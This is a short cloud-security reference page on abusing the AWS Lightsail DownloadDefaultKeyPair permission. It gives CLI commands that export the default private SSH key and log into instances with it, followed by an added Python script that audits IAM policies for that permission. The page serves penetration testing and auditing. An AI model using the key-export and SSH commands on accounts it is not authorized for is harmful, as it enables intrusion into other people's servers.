Lightsail
Abusable AWS Lightsail permissions that can lead to compromise or privilege escalation
lightsail:DownloadDefaultKeyPair
With this action available, you can download the default SSH key pair used by EC2 instances spun up in Lightsail:
# download key to a .pem file
aws lightsail download-default-key-pair --query privateKeyBase64 --output text > lightsail.pem
# change permissions
chmod 400 lightsail.pem
# ssh
ssh -i lightsail.pem <user>@<instance-public-ip>
To find out which SSH key each instance uses, run:
# lightsail:GetInstances
aws lightsail get-instances --query 'instances[].[name,sshKeyName]' --output text
# lightsail:GetInstance
aws lightsail get-instance --instance-name instance-1 --query 'instance.sshKeyName'
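A defensive check for the permission described above, as an added example that is not part of the original page: it scans IAM identity-policy documents for statements that grant lightsail:DownloadDefaultKeyPair, including through wildcards and NotAction. The function names and sample policies are constructed for illustration, and Resource and Condition elements are not evaluated.

```python
import json
import re

TARGET = "lightsail:DownloadDefaultKeyPair"  # the action this page describes

def as_list(value):
    """IAM accepts a bare string/object or a list for Statement, Action, NotAction."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def pattern_matches(pattern, action=TARGET):
    """IAM action patterns are case-insensitive; '*' and '?' are the only wildcards."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, action, re.IGNORECASE) is not None

def covering_statements(policy_json):
    """Return (sid, effect, conditional) for each statement whose actions cover TARGET."""
    hits = []
    for i, stmt in enumerate(as_list(json.loads(policy_json).get("Statement"))):
        if "NotAction" in stmt:  # covers everything except the listed patterns
            covered = not any(pattern_matches(p) for p in as_list(stmt["NotAction"]))
        else:
            covered = any(pattern_matches(p) for p in as_list(stmt.get("Action")))
        if covered:
            hits.append((stmt.get("Sid", f"stmt{i}"), stmt.get("Effect"), "Condition" in stmt))
    return hits

def verdict(policy_jsons):
    """'deny' if an unconditional Deny covers TARGET, else 'allow' if any Allow does, else 'none'.
    Resource and Condition are not evaluated (assumption: review those hits by hand)."""
    hits = [h for doc in policy_jsons for h in covering_statements(doc)]
    if any(effect == "Deny" and not conditional for _, effect, conditional in hits):
        return "deny"
    return "allow" if any(effect == "Allow" for _, effect, _ in hits) else "none"

# Constructed sample policies (not taken from any real account)
WILDCARD = '{"Statement": {"Sid": "LightsailAdmin", "Effect": "Allow", "Action": "lightsail:*", "Resource": "*"}}'
PREFIX = '{"Statement": [{"Effect": "Allow", "Action": ["lightsail:Get*", "lightsail:download*"], "Resource": "*"}]}'
NOT_ACTION = '{"Statement": [{"Sid": "AllButIam", "Effect": "Allow", "NotAction": "iam:*", "Resource": "*"}]}'
READ_ONLY = '{"Statement": [{"Effect": "Allow", "Action": ["lightsail:GetInstances", "lightsail:GetInstance"], "Resource": "*"}]}'
GUARDRAIL = '{"Statement": [{"Sid": "NoKeyExport", "Effect": "Deny", "Action": "lightsail:DownloadDefaultKeyPair", "Resource": "*"}]}'

if __name__ == "__main__":
    for name, docs in [("wildcard", [WILDCARD]), ("read-only", [READ_ONLY]), ("guarded", [WILDCARD, GUARDRAIL])]:
        print(name, verdict(docs))
```

Pass every policy document attached to one principal in a single `verdict` call, so that an explicit Deny in one policy is weighed against an Allow in another.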